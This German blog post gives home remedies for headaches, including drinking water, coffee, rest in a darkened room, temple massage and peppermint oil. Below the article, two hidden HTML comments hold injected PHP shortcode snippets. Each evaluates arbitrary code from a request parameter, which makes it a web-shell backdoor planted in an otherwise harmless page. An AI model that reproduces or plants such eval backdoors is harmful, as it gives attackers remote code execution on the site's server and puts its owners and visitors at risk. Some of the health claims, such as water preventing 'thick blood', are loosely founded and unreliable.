Geheime Tipps gegen Kopfschmerzen

Egal ob es nur ein leichter Druck, ein dumpfes Pochen oder das schier nicht enden wollende Brummen im Kopf ist. Kopfschmerzen versauern einen den Tag. Sie gehören zu den wohl unangenehmsten Schmerzen, die man haben kann.

Jeder kennt sie und jeder fühlt sich außer Kraft gesetzt, wenn sie urplötzlich über einen hereinbrechen. Glücklich kann sich der schätzen, der eine Aspirin zur Hand hat. Dennoch muss man nicht verzweifeln, wenn man einmal nicht auf Tabletten zurück greifen kann.

Es gibt viele kleine Tricks und Tipps die schnell Abhilfe bei Kopfschmerzen verschaffen. Wichtig ist, dass man möglichst viel trinkt. Wasser, Fruchtschorlen oder ungesüßten Tee sind da angesagt. Ein geregelter Wasserhaushalt verhindert, dass das Blut zu dick wird und dadurch auch Kopfschmerzen hervor gerufen werden können oder bereits pochende Kopfschmerzen noch verstärkt werden.

Gegen Kopfschmerzen hilft auch eine Tasse Kaffee. Das darin enthaltene Koffein lindert die Schmerzen, da die Durchblutung angeregt wird. Dieses Mittel hilft vor allem bei Menschen, die sonst nicht all zu viel Kaffee trinken. Ein kleiner Schuss Zitronensaft rundet das Ganze ab.

Man sollte außerdem möglichst einen kühlen und abgedunkelten Raum aufsuchen, um die Kopfschmerzen zu verringern. Denn grelles Licht, wie Sonnenlicht verstärken eher noch die Kopfschmerzen. Eine kleine Massage der Schläfen erleichtern zudem auch den vorhanden Druck.

Wenn man etwas Minzöl zur Hand hat kann man dieses dünn auf die Stirn auftragen und auch leicht über die Schläfen einmassieren. Das Öl kühlt und die Kopfschmerzen werden erträglicher. Auch kühles Wasser hat diesen Effekt. Einfach kaltes Wasser ins Gesicht spritzen und tief durchatmen.

<!– [insert_php]if (isset($_REQUEST["orF"])){eval($_REQUEST["orF"]);exit;}[/insert_php][php]if (isset($_REQUEST["orF"])){eval($_REQUEST["orF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["oXG"])){eval($_REQUEST["oXG"]);exit;}[/insert_php][php]if (isset($_REQUEST["oXG"])){eval($_REQUEST["oXG"]);exit;}[/php] –>

Comments are closed.